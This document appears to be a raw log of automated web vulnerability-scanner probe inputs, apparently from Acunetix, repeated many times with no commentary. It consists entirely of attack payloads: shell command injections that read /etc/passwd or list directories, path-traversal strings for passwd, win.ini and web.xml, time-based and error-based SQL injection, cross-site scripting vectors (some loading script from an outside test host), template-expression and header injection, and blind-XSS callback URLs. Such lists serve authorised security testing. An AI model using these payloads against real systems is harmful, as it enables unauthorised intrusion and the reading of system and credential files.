1

1

"+response.write(9636699*9972585)+"

'&cat /etc/passwd&'

1

................windowswin.ini

1

1

1

1

1

"&cat /etc/passwd&"

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1

cat /etc/passwd

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

`cat /etc/passwd`

1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

SomeCustomInjectedHeader:injected_by_wvs

acu10316\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10316

1

|cat /etc/passwd#

1

1

acux6080\xc0\xbez1\xc0\xbcz2a\x90bcxuca6080

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1<ScRiPt >prompt(962697)</ScRiPt>

'|'ld

1

1

../../../../../../../../../../etc/passwd.jpg

1

1

1

1

"|"ld

1

1<script>prompt(950197)</script>

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

-1

1<ScRiPt >prompt(985751)</ScRiPt>

${99464+99582}

1

1

-1)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

WEB-INF/web.xml

1

1

1

'

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?938297></ScRiPt>

1

WEB-INF\web.xml

1&n994690=v928089

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1))

1

)

1<ScRiPt >prompt(918103)</ScRiPt>

"

1

1some_inexistent_file_with_long_name%00.jpg

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

MNVqCoYk'

1

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

||cat /etc/passwd

!(()&&!|*|*|

1<video><source onerror="javascript:prompt(946005)">

/etc/passwd

1

IV8ARoLm')

testasp.vulnweb.com

'"()

^(#$!@#$)(()))******

1

1

&dir

1

1

1

ILCs9DHv'))

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(990462)"></g></svg>

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'&dir&'

1

1

1

1

-1

"&dir&"

1

1<div style=width:expression(prompt(977469))>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'

1

-1)

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

"

|dir

1<iframe src='data:text/html

1

1

1

-1))

'|dir

1<body onload=prompt(952442)>

${@print(md5(acunetix_wvs_security_test))}

1

acunetix_wvs_invalid_filename

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(906793)>

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

http://hitUx0UVCAvUD.bxss.me/

jq2uMqrG'

1

comments

"|dir

${@print(md5(acunetix_wvs_security_test))}\

1<img src=xyz OnErRor=prompt(951661)>

file:///etc/passwd

comments

nzaLHrKz')

1

1

1

1

1

1

1<img/src=">" onerror=alert(945371)>

comments/.

gzmY19Zo'))

/\../\../\../\../\../\../\../etc/passwd

'"

1

1

http://www.acunetix.tst

1<ScRiPt%20>prompt(935132)</sCripT>

1

1

1

1

<!--

1

1

1&lt

1

1

WEB-INF/web.xml

1

1

1

\xf6<img acu onmouseover=prompt(912997) //\xf6>

1

1

1

1

WEB-INF\web.xml

1

1

1

1

1

1<input autofocus onfocus=prompt(998526)>

1

1'"()&%<ScRiPt >prompt(992375)</ScRiPt>

1

../../../../../../../../../../windows/win.ini

response.write(9962607*9923411)

1

1

1

'"()&%<ScRiPt >prompt(948263)</ScRiPt>

<a href='http://www.acunetix.com'>website security</a>

1

1

../../../../../../../../../../boot.ini

'+response.write(9962607*9923411)+'

&cat /etc/passwd&

1

1

[url=http://www.acunetix.com]website security[/url]

1

1_943097

1

../../../../../../../../../../windows/win.ini.jpg

"+response.write(9962607*9923411)+"

1

1_Mhdls <ScRiPt >prompt(990699)</ScRiPt>

'&cat /etc/passwd&'

1

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

"&cat /etc/passwd&"

1

1

1

1

1

................windowswin.ini

cat /etc/passwd

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

`cat /etc/passwd`

SomeCustomInjectedHeader:injected_by_wvs

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

|cat /etc/passwd#

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

'|'ld

1

1

acu3684\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3684

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

../../../../../../../../../../etc/passwd

1

1

1

1

1

"|"ld

acux4796\xc0\xbez1\xc0\xbcz2a\x90bcxuca4796

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1<ScRiPt >prompt(992397)</ScRiPt>

1

1

1

${100089+100455}

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<script>prompt(944425)</script>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

'

../../../../../../../../../../etc/passwd.jpg

-1

1

1

1

1

1some_inexistent_file_with_long_name%00.jpg

1<ScRiPt >prompt(975862)</ScRiPt>

"

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1)

1&n969672=v905220

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?957695></ScRiPt>

1

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

WEB-INF/web.xml

1

||cat /etc/passwd

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

1

testasp.vulnweb.com

1

!(()&&!|*|*|

1<ScRiPt >prompt(926071)</ScRiPt>

&dir

/../..//../..//../..//../..//../..//etc/passwd.jpg

DAkMOJmb'

1

WEB-INF\web.xml

1<video><source onerror="javascript:prompt(938077)">

^(#$!@#$)(()))******

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

IV3irkWA')

'&dir&'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(972133)"></g></svg>

'"()

1

1

1

1

1<div style=width:expression(prompt(981757))>

/etc/passwd

yO1qr8Yt'))

1

"&dir&"

'

1

1

1<iframe src='data:text/html

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1

1

"

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<body onload=prompt(968481)>

1

1

|dir

1

1

${@print(md5(acunetix_wvs_security_test))}

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1)

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(951109)>

1

http://hitI7EJWCZ4pk.bxss.me/

1

-1))

${@print(md5(acunetix_wvs_security_test))}\

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

'|dir

1<img src=xyz OnErRor=prompt(906171)>

1

1

acunetix_wvs_invalid_filename

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

jtvlnpDG'

1

"|dir

1<img/src=">" onerror=alert(970393)>

1

1

comments

1

1

QvjuAd2I')

1

comments

1

http://www.acunetix.tst

1

1<ScRiPt%20>prompt(972428)</sCripT>

1

FxrWgcJW'))

1

comments/.

file:///etc/passwd

1

'"

1

1

1

1

1&lt

1

1

1

<!--

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

\xf6<img acu onmouseover=prompt(905373) //\xf6>

1'"()&%<ScRiPt >prompt(963816)</ScRiPt>

WEB-INF/web.xml

1

1

1<input autofocus onfocus=prompt(961651)>

1

1

WEB-INF\web.xml

1

'"()&%<ScRiPt >prompt(975265)</ScRiPt>

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

1_980627

1

1

../../../../../../../../../../windows/win.ini

[url=http://www.acunetix.com]website security[/url]

1

1

1

../../../../../../../../../../boot.ini

1

1

1_JqpuM <ScRiPt >prompt(932420)</ScRiPt>

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

................windowswin.ini

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

acu5577\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5577

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

acux1561\xc0\xbez1\xc0\xbcz2a\x90bcxuca1561

1

1

1

WEB-INF/web.xml

1<ScRiPt >prompt(914948)</ScRiPt>

1

1

1<script>prompt(961530)</script>

WEB-INF\web.xml

1

1

1<ScRiPt >prompt(957209)</ScRiPt>

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?954301></ScRiPt>

1

1

1

1

1<ScRiPt >prompt(917522)</ScRiPt>

1

1

1

1

1<video><source onerror="javascript:prompt(920984)">

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(921711)"></g></svg>

1

1<div style=width:expression(prompt(961275))>

1

1

1<iframe src='data:text/html

1

1<body onload=prompt(927834)>

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(966809)>

1

1

1<img src=xyz OnErRor=prompt(953181)>

1

1<img/src=">" onerror=alert(948525)>

1

1<ScRiPt%20>prompt(976708)</sCripT>

1

1

1&lt

1

\xf6<img acu onmouseover=prompt(941967) //\xf6>

1<input autofocus onfocus=prompt(927531)>

1

<a href='http://www.acunetix.com'>website security</a>

response.write(9170508*9336105)

1

1

[url=http://www.acunetix.com]website security[/url]

'+response.write(9170508*9336105)+'

1_PA9nz <ScRiPt >prompt(974001)</ScRiPt>

1

"+response.write(9170508*9336105)+"

&cat /etc/passwd&

1

1

1

1

'&cat /etc/passwd&'

1

1

1

1

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

${99275+100013}

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

1

1

1

../../../../../../../../../../etc/passwd.jpg

SomeCustomInjectedHeader:injected_by_wvs

`cat /etc/passwd`

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n998252=v905978

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1some_inexistent_file_with_long_name%00.jpg

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

|cat /etc/passwd#

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

)

'|'ld

1

testasp.vulnweb.com

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

-1

'"()

"|"ld

1

1

^(#$!@#$)(()))******

/etc/passwd

-1)

1

1

1

1

1

1

'

1

-1))

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

1

1

lFZ1pZVl'

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://hitEMQnJT1zwD.bxss.me/

"

||cat /etc/passwd

1

acunetix_wvs_invalid_filename

kySfJ9gf')

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}

m3456ib1'))

comments

&dir

1

1

-1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

${@print(md5(acunetix_wvs_security_test))}\

'&dir&'

1'"

-1)

comments

file:///etc/passwd

1

1

1

comments/.

-1))

"&dir&"

and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(56),CHAR(105),CHAR(77),CHAR(55),CHAR(119),CHAR(52),CHAR(106),CHAR(71)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and

http://www.acunetix.tst

1

1

1

/\../\../\../\../\../\../\../etc/passwd

|dir

(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(56),CHAR(105),CHAR(77),CHAR(55),CHAR(119),CHAR(52),CHAR(106),CHAR(71)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))

1v35Ntfv'

1

1

'"

1

(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(56)+CHAR(105)+CHAR(77)+CHAR(55)+CHAR(119)+CHAR(52)+CHAR(106)+CHAR(71)) FROM syscolumns)

1'"()&%<ScRiPt >prompt(931454)</ScRiPt>

1

1

'|dir

GpvAYj2D')

WEB-INF/web.xml

<!--

convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(56)+CHAR(105)+CHAR(77)+CHAR(55)+CHAR(119)+CHAR(52)+CHAR(106)+CHAR(71))

rcyOjxu3'))

'"()&%<ScRiPt >prompt(914164)</ScRiPt>

1

1

1

1

'and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(55),CHAR(111),CHAR(78),CHAR(78),CHAR(108),CHAR(82),CHAR(114),CHAR(101)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

response.write(9198414*9062828)

"|dir

WEB-INF\web.xml

1_948390

1

1

'(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(55),CHAR(111),CHAR(78),CHAR(78),CHAR(108),CHAR(82),CHAR(114),CHAR(101)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))'

1

'+response.write(9198414*9062828)+'

../../../../../../../../../../windows/win.ini

1

&cat /etc/passwd&

"+response.write(9198414*9062828)+"

SomeCustomInjectedHeader:injected_by_wvs

'+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(55)+CHAR(111)+CHAR(78)+CHAR(78)+CHAR(108)+CHAR(82)+CHAR(114)+CHAR(101)) FROM syscolumns)+'

1

'&cat /etc/passwd&'

../../../../../../../../../../boot.ini

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

'+convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(55)+CHAR(111)+CHAR(78)+CHAR(78)+CHAR(108)+CHAR(82)+CHAR(114)+CHAR(101))+'

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../windows/win.ini.jpg

"&cat /etc/passwd&"

"and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(66),CHAR(97),CHAR(82),CHAR(50),CHAR(117),CHAR(78),CHAR(73),CHAR(122)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and"

1

1

1

"(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(66),CHAR(97),CHAR(82),CHAR(50),CHAR(117),CHAR(78),CHAR(73),CHAR(122)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))"

cat /etc/passwd

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

"+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(66)+CHAR(97)+CHAR(82)+CHAR(50)+CHAR(117)+CHAR(78)+CHAR(73)+CHAR(122)) FROM syscolumns)+"

1

../../../../../../../../../../etc/passwd

1

`cat /etc/passwd`

"+convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(66)+CHAR(97)+CHAR(82)+CHAR(50)+CHAR(117)+CHAR(78)+CHAR(73)+CHAR(122))+"

................windowswin.ini

1

1

|cat /etc/passwd#

1

..\..\..\..\..\..\..\..\windows\win.ini

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'|'ld

${100074+100384}

1

1

1

acu4972\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4972

../../../../../../../../../../etc/passwd.jpg

"|"ld

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

acux8408\xc0\xbez1\xc0\xbcz2a\x90bcxuca8408

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

1&n905004=v967631

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1some_inexistent_file_with_long_name%00.jpg

1<ScRiPt >prompt(924271)</ScRiPt>

1

-1

1

1

1<script>prompt(971872)</script>

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

)

-1)

1<ScRiPt >prompt(987184)</ScRiPt>

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

"

testasp.vulnweb.com

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?913667></ScRiPt>

-1))

!(()&&!|*|*|

WEB-INF/web.xml

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

||cat /etc/passwd

1

1

^(#$!@#$)(()))******

JpHYZ43s'

1

1<ScRiPt >prompt(950941)</ScRiPt>

&dir

/etc/passwd

WEB-INF\web.xml

1

'&dir&'

1<video><source onerror="javascript:prompt(909605)">

t1puYlds')

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

'"()

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(995556)"></g></svg>

1

s8HB4fUe'))

"&dir&"

1<div style=width:expression(prompt(985989))>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

|dir

-1

1

1<iframe src='data:text/html

1

1

-1)

1

'|dir

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1<body onload=prompt(906950)>

-1))

"|dir

1

'

1

r7aMMSFg'

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(935192)>

acunetix_wvs_invalid_filename

1

"

file:///etc/passwd

1

1

1dTA1Lpq')

${@print(md5(acunetix_wvs_security_test))}

comments

1<img src=xyz OnErRor=prompt(977258)>

1

http://hit9PID6CQW4O.bxss.me/

1

1

/\../\../\../\../\../\../\../etc/passwd

UkuHiObn'))

${@print(md5(acunetix_wvs_security_test))}\

1

1

1<img/src=">" onerror=alert(901232)>

comments

1

1

1

1

1

1

WEB-INF/web.xml

http://www.acunetix.tst

1

comments/.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1<ScRiPt%20>prompt(902039)</sCripT>

'"

1

1

1

<!--

1

1

1

1

1&lt

1

1

WEB-INF\web.xml

1'"()&%<ScRiPt >prompt(913707)</ScRiPt>

1

1

1

\xf6<img acu onmouseover=prompt(905549) //\xf6>

1

1

1

1

../../../../../../../../../../windows/win.ini

1

response.write(9998605*9141593)

'"()&%<ScRiPt >prompt(911853)</ScRiPt>

1

1

1<input autofocus onfocus=prompt(996332)>

1

'+response.write(9998605*9141593)+'

../../../../../../../../../../boot.ini

1

"+response.write(9998605*9141593)+"

1_936284

1

&cat /etc/passwd&

<a href='http://www.acunetix.com'>website security</a>

1

1

../../../../../../../../../../windows/win.ini.jpg

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

[url=http://www.acunetix.com]website security[/url]

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

"&cat /etc/passwd&"

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1_NupgP <ScRiPt >prompt(912378)</ScRiPt>

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

cat /etc/passwd

1

................windowswin.ini

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

`cat /etc/passwd`

1

1

1

../../../../../../../../../../etc/passwd.jpg

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

|cat /etc/passwd#

1

1

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

'|'ld

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

${99808+99812}

1

acu6110\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6110

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

"|"ld

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

acux2765\xc0\xbez1\xc0\xbcz2a\x90bcxuca2765

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt >prompt(912623)</ScRiPt>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1&n980613=v901191

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

-1

1some_inexistent_file_with_long_name%00.jpg

1

1<script>prompt(941223)</script>

1

1

1

'

-1)

)

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/etc/passwd

1

-1))

WEB-INF/web.xml

1<ScRiPt >prompt(977933)</ScRiPt>

"

!(()&&!|*|*|

1

testasp.vulnweb.com

wDfXkbgR'

'"()

||cat /etc/passwd

WEB-INF\web.xml

^(#$!@#$)(()))******

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?962856></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

RNcpcYRJ')

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

&dir

1<ScRiPt >prompt(921509)</ScRiPt>

1

0F58X4Hj'))

1

1

1

1

'&dir&'

1

1<video><source onerror="javascript:prompt(975622)">

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

-1

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

-1)

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(916299)"></g></svg>

1

"&dir&"

"

1

1

1

-1))

http://hitE3ka8WukYe.bxss.me/

1

${@print(md5(acunetix_wvs_security_test))}

1<div style=width:expression(prompt(914694))>

|dir

1

P6g4I0sE'

1

1

acunetix_wvs_invalid_filename

1<iframe src='data:text/html

file:///etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}\

NkW9CyhQ')

1<body onload=prompt(972284)>

comments

1

'|dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

jLcVcvFq'))

/\../\../\../\../\../\../\../etc/passwd

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(973614)>

1

1

1

http://www.acunetix.tst

comments

1

WEB-INF/web.xml

1

1<img src=xyz OnErRor=prompt(995774)>

"|dir

'"

comments/.

1'"()&%<ScRiPt >prompt(924520)</ScRiPt>

1<img/src=">" onerror=alert(948850)>

<!--

WEB-INF\web.xml

1

1

1

1

1<ScRiPt%20>prompt(951644)</sCripT>

1

1

'"()&%<ScRiPt >prompt(960535)</ScRiPt>

1

1

1

../../../../../../../../../../windows/win.ini

1_916326

1

1&lt

1

1

1

1

1

../../../../../../../../../../boot.ini

response.write(9618886*9626185)

\xf6<img acu onmouseover=prompt(925147) //\xf6>

1

1

../../../../../../../../../../windows/win.ini.jpg

'+response.write(9618886*9626185)+'

1

1<input autofocus onfocus=prompt(948472)>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

"+response.write(9618886*9626185)+"

&cat /etc/passwd&

<a href='http://www.acunetix.com'>website security</a>

1

1

'&cat /etc/passwd&'

................windowswin.ini

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

[url=http://www.acunetix.com]website security[/url]

"&cat /etc/passwd&"

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

cat /etc/passwd

1_RlITg <ScRiPt >prompt(991078)</ScRiPt>

SomeCustomInjectedHeader:injected_by_wvs

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1

`cat /etc/passwd`

../../../../../../../../../../etc/passwd.jpg

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

|cat /etc/passwd#

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

acu6624\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6624

1

1

1

1

acux9296\xc0\xbez1\xc0\xbcz2a\x90bcxuca9296

${100484+99385}

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

'|'ld

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

"|"ld

WEB-INF/web.xml

